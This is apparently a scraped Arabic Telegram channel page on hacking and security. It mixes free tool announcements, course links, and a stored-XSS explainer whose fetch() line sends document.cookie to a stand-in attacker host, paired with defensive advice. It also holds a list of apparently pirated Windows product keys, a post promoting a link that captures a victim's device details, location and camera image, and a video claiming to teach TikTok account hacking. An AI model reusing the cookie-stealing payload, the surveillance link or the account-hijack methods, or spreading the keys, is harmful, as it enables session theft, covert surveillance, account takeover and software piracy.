مجتمع الأمن المعلوماتي
12K subscribers
45 photos
33 videos
19 files
19 links
عالم واسع من خلال مختصين وكفاءات عالية نختصر كل ما يتعلق بالربح من الانترنت و بمجال الهاكينغ وأمن المعلومات
Download Telegram
free faculty.pdf
1002 KB
نقدم لكم - ومجانا بشكل كامل

أكثر من 150 أداة من أدوات الامن السيبراني يطورها معهد #SANS و بشكل مجاني في المجالات السيبرانية التالية:

الدفاع السيبراني
الاستجابة للحوادث
التحليل الجنائي الرقمي
اختبار الاختراق
أمن السحابة
أنظمة التحكم الصناعي


لا تنسي المشاركة لصديقك ليكون فائدة لجميع 💟

#الامن_السيبراني #أمن_المعلومات #Google #Tech
This media is not supported in your browser
VIEW IN TELEGRAM
كيف تعرف اسماء الموظفين في أي شركة !؟
This media is not supported in your browser
VIEW IN TELEGRAM
باستخدام هذه الأداء بتقدر ترسل رابط لصديقك وتحصل على معلومات جهازك وعنوانه في Google maps والتقاط صورة من الكاميرة

#Google #امن_المعلومات #الأمن_السيبراني #Tech
كنز من الكورسات مرفوع على جوجل درايف باللغة الإنجليزية

هذا المنشور منجم ذهب للموارد وسيساعدنا في الانتقال إلى أي مجموعة من التقنيات :

المحتوى:

👉🏿ماجستير إدارة الأعمال
👉🏿بايثون
👉🏿بيانات ضخمة
👉🏿علم البيانات
👉🏿معتمد من AWS
👉🏿تحليلات البيانات
👉🏿الاختراق الأخلاقي
👉🏿الحوسبة السحابية
👉🏿التعلم الآلي
👉🏿الذكاء الاصطناعي




🔗https://drive.google.com/drive/u/0/mobile/folders/1CgN7DE3pNRNh_4BA_zrrMLqWz6KquwuD

🔗https://drive.google.com/drive/mobile/folders/1if09a9QyNfBRlAKey7If5preZ3BswudZ
This media is not supported in your browser
VIEW IN TELEGRAM
كيف يتم سرقة الكوكيز باستخدام XSS ؟

الفكرة ببساطة :
في هجوم XSS من النوع Stored يقوم المهاجم بحقن كود JavaScript ضار داخل موقع إلكتروني يعرض البيانات للمستخدمين الآخرين دون أي فلاتر أو تعقيم

هذا الكود يمكنه
سرقة ملفات تعريف الارتباط (cookies)
إرسالها إلى سيرفر خارجي تابع للمهاجم
اختراق جلسة المستخدم (Session Hijacking)

ما الذي يحتاجه المهاجم ؟؟
وجود ثغرة XSS مخزنة داخل الموقع
سيرفر خارجي أو خدمة وسيطة مثل Ngrok أو Cloudflare Tunnel لاستقبال الكوكيز

fetch("https://attacker-server.com/log?cookie=" + document.cookie);


كيف تحمي نفسك كمطور أو مسؤول عن الموقع ؟

1 _ تعقيم كافة المدخلات لا تثق بأي مدخل من المستخدم
2 _ استخدام الكوكيز بـ HttpOnly يمنع قراءتها من JavaScript
3 _ تفعيل Content Security Policy (CSP) لتقييد تحميل السكربتات الخارجية
4 _ مراقبة السجلات (Logs) لاكتشاف أي نشاط غير طبيعي مبكرا

ملاحظة
هجمات XSS سهلة في التنفيذ لكن تأثيرها خطير جدا إذا لم يكن الموقع مؤمن بشكل جيد.
الوعي هو خط الدفاع الأول سواء كنت مطور باحث أمني أو حتى مستخدم عادي
📱 Windows 10/11 RTM Professional OEM:DM

Key: 2GNB8-DXKRM-4TQWW-46B92-4RG6P
Key: YQQX3-NMXJX-BHKHM-TCTK6-QYH22
Key: CQ3NH-WYMGQ-C2T6B-V9PWB-RC2KC
Key: BQVWF-K2NJ9-3PDWH-447RV-CYT6P
Key: YNTV8-8C486-BCWT6-TQCP6-PDKTP
Key: VT2JN-CXX6W-KBHGR-F9XPF-TVJXC
Key: FNX3B-44Q79-GHMT7-FVPVV-X766P
Key: 9277G-HN8YR-PCCFH-8WFVT-HFR9C
Key: YNHPX-TX474-X3BV8-9JWTG-683GP
Key: 7D3VP-4NQM4-F6B2X-FXJCG-QYH22
Key: R8N3H-9F8JX-Y3D39-MRCP7-GCQGP
يحتوي DeepWeb على 5 مستويات وكل مستوى يختلف في طريقة الوصول اليه ويختلف في ( أهمية المعلومات ) التي يحتوي عليها 👌

#الامن_السيبراني #امن_المعلومات #Google #Tech
This media is not supported in your browser
VIEW IN TELEGRAM
في الفيديو دا شرحنا طريقه اختراق حسابات تيكتوك بكل سهوله
الهدف من الشرح التعلم والحمايه فقط